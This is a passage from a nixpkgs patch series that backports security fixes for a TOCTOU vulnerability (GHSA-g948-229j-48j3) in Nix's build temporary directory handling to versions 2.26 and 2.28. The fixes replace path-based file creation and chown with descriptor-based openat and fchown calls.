LocalDerivationGoal::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void LocalDerivationGoal::runChild() + { +@@ -3006,6 +3027,15 @@ void LocalDerivationGoal::checkOutputs(const std::mapisBuiltin()) { +diff --git a/src/libstore/unix/build/local-derivation-goal.hh b/src/libstore/unix/build/local-derivation-goal.hh +index bf25cf2a6..69c517c4a 100644 +--- a/src/libstore/unix/build/local-derivation-goal.hh ++++ b/src/libstore/unix/build/local-derivation-goal.hh +@@ -37,6 +37,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -232,9 +237,24 @@ struct LocalDerivationGoal : public DerivationGoal + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. 
++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + int getChildStatus() override; + + /** +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index 8ec38e73b..554214d66 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -247,7 +247,7 @@ void readFile(const Path & path, Sink & sink) + } + + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFile(const Path & path, std::string_view s, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -257,22 +257,29 @@ void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) + , mode)); + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, path, s, mode, sync); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode, FsSync sync) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s); ++ ++ if (sync == FsSync::Yes) ++ fd.fsync(); ++ + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", origPath); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +- +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -296,11 +303,11 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- if (sync) ++ if (sync == FsSync::Yes) + fd.fsync(); + // Explicitly close to make sure exceptions are propagated. + fd.close(); +- if (sync) ++ if (sync == FsSync::Yes) + syncParent(path); + } + +@@ -318,7 +325,8 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + #ifndef _WIN32 + checkInterrupt(); + +- std::string name(baseNameOf(path.native())); ++ std::string name(path.filename()); ++ assert(name != "." && name != ".." && !name.empty()); + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, +@@ -359,7 +367,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + throw SysError("chmod '%1%'", path); + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) + throw SysError("opening directory '%1%'", path); + AutoCloseDir dir(fdopendir(fd)); +@@ -371,7 +379,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + checkInterrupt(); + std::string childName = dirent->d_name; + if (childName == "." 
|| childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory '%1%'", path); + } +@@ -389,14 +397,13 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + + static void _deletePath(const fs::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh +index ed1112c7e..32b84456d 100644 +--- a/src/libutil/file-system.hh ++++ b/src/libutil/file-system.hh +@@ -148,12 +148,16 @@ Descriptor openDirectory(const std::filesystem::path & path); + std::string readFile(const Path & path); + void readFile(const Path & path, Sink & sink); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. + */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); + + /** + * Flush a file's parent directory to disk +-- +2.44.1 + From 639ad310605baa85093cdb0692759aedaaa02780 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:50:46 +0200 Subject: [PATCH 59/73] nix_2_26: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. 
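As a rough illustration (not part of the patch, and simplified from the real
LocalDerivationGoal code it touches), the race and the fd-based fix look like
this:

    // Racy (sketch): between writeFile() and chown(), a malicious builder can
    // swap a path component for a symlink and redirect the chown elsewhere.
    Path p = tmpDir + "/" + fn;
    writeFile(p, contents);
    chownToBuilder(p);              // acts on whatever 'p' resolves to *now*

    // Fixed (sketch): create the file relative to a pinned directory fd.
    // O_EXCL | O_NOFOLLOW reject planted files and symlinks, and fchown()
    // then affects exactly the file that was just created.
    AutoCloseFD fd{openat(tmpDirFd.get(), fn.c_str(),
        O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)};
    if (!fd)
        throw SysError("creating file %s", fn);
    writeFile(fd, fn, contents);
    chownToBuilder(fd.get(), fn);   // fchown() on the open descriptor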
The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 1 + .../patches/ghsa-g948-229j-48j3-2.26.patch | 463 ++++++++++++++++++ 2 files changed, 464 insertions(+) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 839b6e0b3127..0096e514d7b5 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -178,6 +178,7 @@ lib.makeExtensible ( nix_2_26 = commonMeson { version = "2.26.3"; hash = "sha256-5ZV8YqU8mfFmoAMiUEuBqNwk0T3vUR//x1D12BiYCeY="; + patches = [ ./patches/ghsa-g948-229j-48j3-2.26.patch ]; self_attribute_name = "nix_2_26"; }; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch new file mode 100644 index 000000000000..985e7b29e53f --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.26.patch @@ -0,0 +1,463 @@ +From 787e012f26761e1455e711ab4ceedaa2c740621c Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. 
+
+ Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96
+ Signed-off-by: Raito Bezarius
+
+commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea
+Author: Raito Bezarius
+Date: Wed Mar 26 01:07:47 2025 +0100
+
+ libstore: ensure that `passAsFile` is created in the original temp dir
+
+ This ensures that `passAsFile` data is created inside the expected
+ temporary build directory by `openat()` from the parent directory file
+ descriptor.
+
+ This avoids a TOCTOU which is part of the attack chain of CVE-????.
+
+ Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a
+ Signed-off-by: Raito Bezarius
+
+commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018
+Author: Raito Bezarius
+Date: Wed Mar 26 01:06:03 2025 +0100
+
+ libutil: writeFile variant for file descriptors
+
+ `writeFile` lose its `sync` boolean flag to make things simpler.
+
+ A new `writeFileAndSync` function is created and all call sites are
+ converted to it.
+
+ Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192
+ Signed-off-by: Raito Bezarius
+
+commit 732bd9b98cabf4aaf95a01fd318923de303f9996
+Author: Raito Bezarius
+Date: Wed Mar 26 01:05:34 2025 +0100
+
+ libstore: chown to builder variant for file descriptors
+
+ We use it immediately for the build temporary directory.
+
+ Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947
+ Signed-off-by: Raito Bezarius
+
+commit 962c65f8dcd5570dd92c72370a862c7b38942e0d
+Author: Raito Bezarius
+Date: Wed Mar 26 01:04:59 2025 +0100
+
+ libstore: open build directory as a dirfd as well
+
+ We now keep around a proper AutoCloseFD around the temporary directory
+ which we plan to use for openat operations and avoiding the build
+ directory being swapped out while we are doing something else.
+
+ Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a
+ Signed-off-by: Raito Bezarius
+
+commit c9b42462b75b5a37ee6564c2b53cff186c8323da
+Author: Raito Bezarius
+Date: Wed Mar 26 01:04:12 2025 +0100
+
+ libutil: guess or invent a path from file descriptors
+
+ This is useful for certain error recovery paths (no pun intended) that
+ does not thread through the original path name.
+
+ Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e
+ Signed-off-by: Raito Bezarius
+
+Signed-off-by: Jörg Thalheim
+---
+ src/libstore/local-store.cc | 6 +--
+ .../unix/build/local-derivation-goal.cc | 46 ++++++++++++++----
+ .../unix/build/local-derivation-goal.hh | 20 ++++++++
+ src/libutil/file-content-address.cc | 2 +-
+ src/libutil/file-system.cc | 47 +++++++++++--------
+ src/libutil/file-system.hh | 14 ++++--
+ 6 files changed, 99 insertions(+), 36 deletions(-)
+
+diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
+index 9a7a941b6..c0c808e0a 100644
+--- a/src/libstore/local-store.cc
++++ b/src/libstore/local-store.cc
+@@ -116,7 +116,7 @@ LocalStore::LocalStore(
+ state->stmts = std::make_unique<State::Stmts>();
+
+ /* Create missing state directories if they don't already exist.
*/ +- createDirs(realStoreDir); ++ createDirs(realStoreDir.get()); + if (readOnly) { + experimentalFeatureSettings.require(Xp::ReadOnlyLocalStore); + } else { +@@ -248,7 +248,7 @@ LocalStore::LocalStore( + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -299,7 +299,7 @@ LocalStore::LocalStore( + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/local-derivation-goal.cc b/src/libstore/unix/build/local-derivation-goal.cc +index 5b9bc0bb0..80309e332 100644 +--- a/src/libstore/unix/build/local-derivation-goal.cc ++++ b/src/libstore/unix/build/local-derivation-goal.cc +@@ -559,7 +559,14 @@ void LocalDerivationGoal::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -1157,9 +1164,7 @@ void LocalDerivationGoal::initTmpDir() + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1264,11 +1269,9 @@ void LocalDerivationGoal::writeStructuredAttrs() + + auto jsonSh = writeStructuredAttrsShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1779,6 +1782,24 @@ void setupSeccomp() + #endif + } + ++void LocalDerivationGoal::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void LocalDerivationGoal::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void LocalDerivationGoal::runChild() + { +@@ -3038,6 +3059,15 @@ void LocalDerivationGoal::checkOutputs(const 
std::mapisBuiltin()) { +diff --git a/src/libstore/unix/build/local-derivation-goal.hh b/src/libstore/unix/build/local-derivation-goal.hh +index 1ea247661..74a1e1c50 100644 +--- a/src/libstore/unix/build/local-derivation-goal.hh ++++ b/src/libstore/unix/build/local-derivation-goal.hh +@@ -37,6 +37,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -244,9 +249,24 @@ struct LocalDerivationGoal : public DerivationGoal + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. ++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + int getChildStatus() override; + + /** +diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc +index 69301d9c8..2b6839346 100644 +--- a/src/libutil/file-content-address.cc ++++ b/src/libutil/file-content-address.cc +@@ -93,7 +93,7 @@ void restorePath( + { + switch (method) { + case FileSerialisationMethod::Flat: +- writeFile(path, source, 0666, startFsync); ++ writeFile(path, source, 0666, startFsync ? FsSync::Yes : FsSync::No); + break; + case FileSerialisationMethod::NixArchive: + restorePath(path, source, startFsync); +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index 6fe93b63a..b3183f495 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -258,7 +258,7 @@ void readFile(const Path & path, Sink & sink) + } + + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFile(const Path & path, std::string_view s, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -268,22 +268,29 @@ void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) + , mode)); + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, path, s, mode, sync); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode, FsSync sync) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s); ++ ++ if (sync == FsSync::Yes) ++ fd.fsync(); ++ + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", origPath); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +- +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -307,11 +314,11 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- if (sync) ++ if (sync == FsSync::Yes) + fd.fsync(); + // Explicitly close to make sure exceptions are propagated. 
+ fd.close(); +- if (sync) ++ if (sync == FsSync::Yes) + syncParent(path); + } + +@@ -374,7 +381,8 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + #ifndef _WIN32 + checkInterrupt(); + +- std::string name(baseNameOf(path.native())); ++ std::string name(path.filename()); ++ assert(name != "." && name != ".." && !name.empty()); + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, +@@ -415,7 +423,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + throw SysError("chmod %1%", path); + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) + throw SysError("opening directory %1%", path); + AutoCloseDir dir(fdopendir(fd)); +@@ -427,7 +435,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + checkInterrupt(); + std::string childName = dirent->d_name; + if (childName == "." || childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory %1%", path); + } +@@ -445,14 +453,13 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + + static void _deletePath(const fs::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh +index 204907339..b2db8869e 100644 +--- a/src/libutil/file-system.hh ++++ b/src/libutil/file-system.hh +@@ -194,21 +194,27 @@ std::string readFile(const Path & path); + std::string readFile(const std::filesystem::path & path); + void readFile(const Path & path, Sink & sink); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. 
+ */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), s, mode, sync); + } + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), source, mode, sync); + } + ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ + /** + * Flush a path's parent directory to disk. + */ +-- +2.49.0 + From a1eacc0a2ce4a4de3c7fd523ddb26c2d95a01fd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:51:23 +0200 Subject: [PATCH 60/73] nix_2_28: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 1 + .../patches/ghsa-g948-229j-48j3-2.28.patch | 454 ++++++++++++++++++ 2 files changed, 455 insertions(+) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 0096e514d7b5..97fb2eac30ef 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -185,6 +185,7 @@ lib.makeExtensible ( nix_2_28 = commonMeson { version = "2.28.3"; hash = "sha256-TjZp5ITSUvNRAzNznmkZRQxNRzMLiSAplz4bV2T8cbs="; + patches = [ ./patches/ghsa-g948-229j-48j3-2.28.patch ]; self_attribute_name = "nix_2_28"; }; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch new file mode 100644 index 000000000000..7de531128279 --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.28.patch @@ -0,0 +1,454 @@ +From 24c1aa735a40d3bf5361755fa10ac0e577a55eed Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop 
writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. + + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. 
